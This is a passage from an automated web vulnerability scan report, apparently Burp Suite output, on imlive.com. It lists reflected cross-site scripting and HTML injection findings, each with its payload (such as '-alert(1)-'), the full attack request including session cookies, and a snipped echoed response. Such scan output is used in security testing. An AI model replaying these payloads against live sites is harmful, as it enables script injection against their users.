4.549. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/shemale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8242"><a>b60847be956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shemale/?f8242"><a>b60847be956=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.550. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/shy-girl/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df49d'-alert(1)-'469a7a377c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:40 GMT
Connection: close
Content-Length: 171563
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

4.551. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/shy-girl/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b1a0"><a>61a08cd9cef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.552. http://imlive.com/liveexperts.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/liveexperts.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42604'><a>750b6f3eb7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /liveexperts.asp?42604'><a>750b6f3eb7b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:10 GMT
Connection: close
Content-Length: 19420
Vary: Accept-Encoding

<html>
   <head>
       <title>live webcam video chat with experts at imlive</title>
       <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp?42604'><a>750b6f3eb7b=1&lr=1107816009&ud=0&pe=liveexperts.asp&qs=42604'>
...[SNIP]...

4.553. http://imlive.com/localcompanionship.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/localcompanionship.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9f12'><a>f87a2832891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /localcompanionship.asp?d9f12'><a>f87a2832891=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:12 GMT
Connection: close
Content-Length: 16579
Vary: Accept-Encoding

<html>
   <head>
       <title>Friends & Romance on Webcam Video Chat at ImLive</title>
       <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp?d9f12'><a>f87a2832891=1&lr=1107816009&ud=0&pe=localcompanionship.asp&qs=d9f12'>
...[SNIP]...

4.554. http://imlive.com/minglesingles.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/minglesingles.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a452'><a>a6955adbf25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /minglesingles.asp?1a452'><a>a6955adbf25=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:10 GMT
Connection: close
Content-Length: 16143
Vary: Accept-Encoding

<html>
   <head>
       <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title>
       <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp?1a452'><a>a6955adbf25=1&lr=1107816009&ud=0&pe=minglesingles.asp&qs=1a452'>
...[SNIP]...

4.555. http://imlive.com/pr.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/pr.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90148'><a>2e9c3e6d159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /pr.asp?90148'><a>2e9c3e6d159=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:18 GMT
Connection: close
Content-Length: 9886
Vary: Accept-Encoding



<html>
   <head>
       <title>Public Relations of ImLive Video Chat</title>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/pr.asp?90148'><a>2e9c3e6d159=1&lr=1107816009&ud=0&pe=pr.asp&qs=90148'>
...[SNIP]...

4.556. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/preparesearch.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf17'-alert(1)-'f7758fd0154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /preparesearch.asp?1cf17'-alert(1)-'f7758fd0154=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:57 GMT
Connection: close
Content-Length: 19576
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

4.557. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/preparesearch.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad584"><a>5bd7ab7e3b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /preparesearch.asp?ad584"><a>5bd7ab7e3b0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:33 GMT
Connection: close
Content-Length: 19415
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?ad584"><a>5bd7ab7e3b0=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.558. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/preparesearch.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed33"><a>4a10453e31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /preparesearch.aspx?aed33"><a>4a10453e31b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
